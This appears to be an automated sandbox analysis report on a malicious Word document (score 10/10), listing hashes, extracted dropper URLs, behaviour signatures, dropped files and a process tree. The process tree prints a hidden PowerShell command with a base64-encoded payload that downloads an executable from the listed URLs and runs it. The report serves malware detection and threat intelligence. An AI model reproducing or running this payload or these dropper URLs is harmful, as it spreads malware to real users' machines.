Analysis

  • max time kernel
    100s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 17:43

General

  • Target

    ebdde483075c4e4989d66aa8d905204a_JaffaCakes118.doc

  • Size

    127KB

  • MD5

    ebdde483075c4e4989d66aa8d905204a

  • SHA1

    8dbdc9875fce1de0bd61ce33a10b4a3d14bd8e31

  • SHA256

    739add20d743a8d00b6fc26c0e0985b6876748fe5fee82b81c62b49cb151f571

  • SHA512

    2511b413f089d4c9805d42f6290df49000d850e1ee4d1bada66b8fa93a53ebceb4befc1d5a05504ed1d47b59e823f3a9cbe3850588303ac005369e13d89409f4

  • SSDEEP

    3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qUYxsEDhSeVJlY9uX:h77HUUUUUUUUUUUUUUUUUUUT52VDWSeB

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://overcreative.com/css/shecgesia_cjtf7s6-2586658720/

exe.dropper

http://antonresidential.com/wkdrlk/papkaa17/NujUJetNy/

exe.dropper

http://gawaher-services.com/nngb24y/vXGApWUwd/

exe.dropper

http://thepropertydealerz.com/cgi-bin/5ze7vs_tgt6e3k-5/

exe.dropper

http://guimaraesconstrutorasjc.com.br/wp-content/NTlTZtAUB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ebdde483075c4e4989d66aa8d905204a_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABOAF8ANABfADAANQA3AF8APQAnAHUAMAAyAF8AOQAwACcAOwAkAFUAOQA2ADQAOQAxADcAXwAgAD0AIAAnADcANwAwACcAOwAkAHcAMwA1ADYAXwA3AD0AJwBWADEAMQAyADYAMgA5ACcAOwAkAHMANgA5ADgAMQBfADEAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVQA5ADYANAA5ADEANwBfACsAJwAuAGUAeABlACcAOwAkAEwAOQAwADcANAAxADQAXwA9ACcAaAA3ADcAMAAzADEAOAAnADsAJABtADAAMQA0ADkAOQAwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdABgAC4AVwBgAEUAQgBDAGwASQBlAGAATgB0ADsAJABhADMANAAwADMANwA5AD0AJwBoAHQAdABwAHMAOgAvAC8AbwB2AGUAcgBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAGMAcwBzAC8AcwBoAGUAYwBnAGUAcwBpAGEAXwBjAGoAdABmADcAcwA2AC0AMgA1ADgANgA2ADUAOAA3ADIAMAAvAEAAaAB0AHQAcAA6AC8ALwBhAG4AdABvAG4AcgBlAHMAaQBkAGUAbgB0AGkAYQBsAC4AYwBvAG0ALwB3AGsAZAByAGwAawAvAHAAYQBwAGsAYQBhADEANwAvAE4AdQBqAFUASgBlAHQATgB5AC8AQABoAHQAdABwADoALwAvAGcAYQB3AGEAaABlAHIALQBzAGUAcgB2AGkAYwBlAHMALgBjAG8AbQAvAG4AbgBnAGIAMgA0AHkALwB2AFgARwBBAHAAVwBVAHcAZAAvAEAAaAB0AHQAcAA6AC8ALwB0AGgAZQBwAHIAbwBwAGUAcgB0AHkAZABlAGEAbABlAHIAegAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADUAegBlADcAdgBzAF8AdABnAHQANgBlADMAawAtADUALwBAAGgAdAB0AHAAOgAvAC8AZwB1AGkAbQBhAHIAYQBlAHMAYwBvAG4AcwB0AHIAdQB0AG8AcgBhAHMAagBjAC4AYwBvAG0ALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATgBUAGwAVABaAHQAQQBVAEIALwAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAcwA1ADQANAAyAF8AMwA9ACcASAA1ADgANQAzADAANwBfACcAOwBmAG8AcgBlAGEAYwBoACgAJABaADEAOQA5ADEAOQA1AF8AIABpAG4AIAAkAGEAMwA0ADAAMwA3ADkAKQB7AHQAcgB5AHsAJABtADAAMQA0ADkAOQAwAC4ARABvAFcATgBsAG8AYQBkAEYAaQBsAGUAKAAkAFoAMQA5ADkAMQA5ADUAXwAsACAAJABzADYAOQA4ADEAXwAxADIAKQA7ACQAagAzADEANwBfADEAMQAwAD0AJwBxADIAOQA0ADIAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHMANgA5ADgAMQBfADEAMgApAC4AbABlAG4ARwBUAEgAIAAtAGcAZQAgADIAOQAyADIAOAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABzADYAOQA4ADEAXwAxADIAOwAkAGoAOAAyADEANgA5ADcAPQAnAFYAOAAzADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAG4AMAA1ADQAMgAxADUAPQAnAEMAOAA1ADQANAA1ADkANwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADMANwA5ADUAMgA9ACcASgAwADcAOQA5ADEAOAAnAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3968

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C38FE24C.wmf

      Filesize

      444B

      MD5

      96e05424fa92b28eb38724c9a39a29a2

      SHA1

      d3ed4c3d51df9034a4a1d4a6398e8440a2c8adaf

      SHA256

      4902da1372d12db683f98bab995d59413babbdabf935960fd8e03ded80791a1a

      SHA512

      8077345a522fd1a60c7e414ad25316d230bbe294f342206766ab3cb7c2480ca4c754948458fdd74508ccfb7033c741d696ffee0c35a55c6d59411a9668b31a65

    • C:\Users\Admin\AppData\Local\Temp\TCDCA86.tmp\iso690.xsl

      Filesize

      263KB

      MD5

      ff0e07eff1333cdf9fc2523d323dd654

      SHA1

      77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

      SHA256

      3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

      SHA512

      b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zizf4ybj.kgz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

      Filesize

      1KB

      MD5

      7d64063bae2a0f14d6aa9a3e09326dc6

      SHA1

      aff5fe5e58d72d46e3e93e1fdd04cf0beb882cee

      SHA256

      8dfead394085003064bc830de605f2c853ec4b9d8eaa8ce5ff88a7041ba85843

      SHA512

      b9f465c4be448a60786b3882d5bc27c9e6232b939a916fcb92562c1fce4b942dc3e927ae81af941c00767415f61b7c8c450bca0fe213a1f0fb976aad80291bce

    • memory/3600-8-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-5-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-10-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-13-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-12-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-11-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-15-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-16-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-18-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-17-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-19-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-14-0x00007FF863010000-0x00007FF863020000-memory.dmp

      Filesize

      64KB

    • memory/3600-1-0x00007FF8A52CD000-0x00007FF8A52CE000-memory.dmp

      Filesize

      4KB

    • memory/3600-7-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-6-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-9-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-20-0x00007FF863010000-0x00007FF863020000-memory.dmp

      Filesize

      64KB

    • memory/3600-4-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-592-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-2-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-73-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-74-0x00007FF8A52CD000-0x00007FF8A52CE000-memory.dmp

      Filesize

      4KB

    • memory/3600-75-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-76-0x00007FF8A5230000-0x00007FF8A5425000-memory.dmp

      Filesize

      2.0MB

    • memory/3600-3-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-0-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-589-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-590-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-591-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3600-588-0x00007FF8652B0000-0x00007FF8652C0000-memory.dmp

      Filesize

      64KB

    • memory/3968-55-0x000002040FDA0000-0x000002040FDC2000-memory.dmp

      Filesize

      136KB